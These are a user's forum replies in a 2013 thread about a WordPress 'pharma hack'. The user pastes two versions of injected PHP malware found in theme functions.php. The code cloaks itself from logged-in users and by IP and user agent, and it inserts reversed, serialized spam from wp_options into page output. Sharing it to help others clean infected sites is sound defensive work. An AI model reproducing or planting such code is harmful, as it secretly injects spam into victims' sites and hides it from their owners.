Grady Booch

Forum Replies Created

Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • July 19, 2013 at 11:52 pm in reply to: Weird pharma hack #788

    Grady Booch
    Member

    Last thing before I’m off to bed, for those of you chasing down this same problem..the combination of Eli’s wonderful anti-malware plug in plus the use of the Exploit Scanner plugin are what I’ve used to stamp out this hack.

    Happy hunting…

    July 19, 2013 at 11:51 pm in reply to: Weird pharma hack #787

    Grady Booch
    Member

    Thanks, Eli!

    BTW, my second site was hacked in a similar albeit subtly different way. In this case, the offending wp_options name/value pair is store in a different place (it’s named _property1) and the code that’s generated that’s injected just after a page’s body is this

     
    if (!function_exists(“b_call”)) {
    function b_call() {
    if (!ob_get_level()) ob_start(“b_goes”);
    }
    function b_goes($p) {
    if (!defined(‘wp_m1′)) {
    $f1 = explode(‘|’, ’3639549952,8191.1123631104,8191.1089052672,8191.1078218752,2047.1078220802,1229.1087381508,1444.3512041472,4095.1113980928,4095.1208926208,16383.1249705984,65535|via translate.google.com,Google WAP Proxy,Google CHTML Proxy|tumblrbot’);
    $f3=0;
    $f2=ip2long($_SERVER["REMOTE_ADDR"]);
    foreach(explode(‘.’, array_shift($f1)) as $line) {
    list($a1,$a2)=explode(‘,’,$line);
    if ($f2>=$a1&&$f2<=($a1+$a2)) {
    $f3=1;
    break;
    }
    }
    foreach(array_reverse($f1,1) as $k=>$v) {
    foreach(explode(‘,’, $v) as $line) {
    if (stripos($_SERVER["HTTP_USER_AGENT"], $line) !== false) {
    $f3=$k;
    break;
    }
    }
    }
    if (!$f3 || isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists(‘is_user_logged_in’) && is_user_logged_in()) || (!$m = get_option(‘_property1′))) {
    return $p;
    }
    list($m, $n) = @unserialize(trim(strrev($m)));
    define(‘wp_m1′, $m);
    define(‘wp_n1′, $n);
    }
    if (!stripos($p, wp_n1)) $p = preg_replace(“~<body[^>]*>~i”, “$0\n”.wp_n1, $p, 1);
    if (!stripos($p, wp_m1)) $p = preg_replace(“~</head>~”, wp_m1.”\n</head>”, $p, 1);
    if (!stripos($p, wp_n1)) $p = preg_replace(“~</div>~”, “</div>\n”.wp_n1, $p, 1);
    if (!stripos($p, wp_m1)) $p = preg_replace(“~</div>~”, wp_m1.”\n</div>”, $p, 1);
    return $p;
    }
    function b_end() {
    @ob_end_flush();
    }
    if (ob_get_level()) ob_end_clean();
    add_action(“init”, “b_call”);
    add_action(“wp_head”, “b_call”);
    add_action(“get_sidebar”, “b_call”);
    add_action(“wp_footer”, “b_call”);
    add_action(“shutdown”, “b_end”);
    }

    but, it has the same effect (the value of the spam was the same for both sites, although the code was different as above and the name of the wp_option item was different.

    July 19, 2013 at 9:04 pm in reply to: Weird pharma hack #784

    Grady Booch
    Member

    Further update on the cleansing of my site….

    I’ve purged what appear all the bogus/changed core files that may have been the cause of the hack, although I’m not completely confident….I need to look through all my plugins. But, most important, I found that this hack is using an entry in the table wp_options to hold a key/value pair, containing the spam message (in reverse, which is a signature of the pharam hack). Specifically, check out the record whose name is _textalternate2 and you’ll see the offending code.

    So, it’s a start…

    July 19, 2013 at 3:35 pm in reply to: Weird pharma hack #782

    Grady Booch
    Member

    I also am trying to unwind this weird pharma hack, which has infected two of my websites (computingthehumanexperience.com and creationsbyjan.com). In both cases, the hack is infecting the functions.php file of my resident themes.

    Your plug in did indeed detect the offending code (which looks like this)
    if (!function_exists(“b_call”)) {
    function b_call() {
    if (!ob_get_level()) ob_start(“b_goes”);
    }
    function b_goes($p) {
    if (!defined(‘wp_m1′)) {
    if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists(‘is_user_logged_in’) && is_user_logged_in()) || (!$m = get_option(‘_textalternate2′))) {
    return $p;
    }
    list($m, $n) = @unserialize(trim(strrev($m)));
    define(‘wp_m1′, $m);
    define(‘wp_n1′, $n);
    }
    if (!stripos($p, wp_n1)) $p = preg_replace(“~<body[^>]*>~i”, “$0\n”.wp_n1, $p, 1);
    if (!stripos($p, wp_m1)) $p = preg_replace(“~</head>~”, wp_m1.”\n</head>”, $p, 1);
    if (!stripos($p, wp_n1)) $p = preg_replace(“~</div>~”, “</div>\n”.wp_n1, $p, 1);
    if (!stripos($p, wp_m1)) $p = preg_replace(“~</div>~”, wp_m1.”\n</div>”, $p, 1);
    return $p;
    }
    function b_end() {
    @ob_end_flush();
    }
    if (ob_get_level()) ob_end_clean();
    add_action(“init”, “b_call”);
    add_action(“wp_head”, “b_call”);
    add_action(“get_sidebar”, “b_call”);
    add_action(“wp_footer”, “b_call”);
    add_action(“shutdown”, “b_end”);
    }

    I’m currently throwing all sort of things at the problem. Exploit Scanner uncovered a handful of core wordpress files that should not be there (and I’ve eliminated those) but clearly there’s still something in the database that makes this injected code pop up at random times like a whack-a-mole game. I’ve checked the usual places in the wp-options table (but no joy yet) and i’m about to look through all my plugins for strange code).

    As for the database investigation, I should point out that all the usual table item names that have been typically used in pharma attacks are not present….this current  attack appears to be some new variation.

    Needless to say, this is annoying :-(

    (and thank you, your plugin  helped me  attend to the immediate symptoms….now i just need to find the root of the disease)

  • Author
    Posts
Viewing 4 posts - 1 through 4 (of 4 total)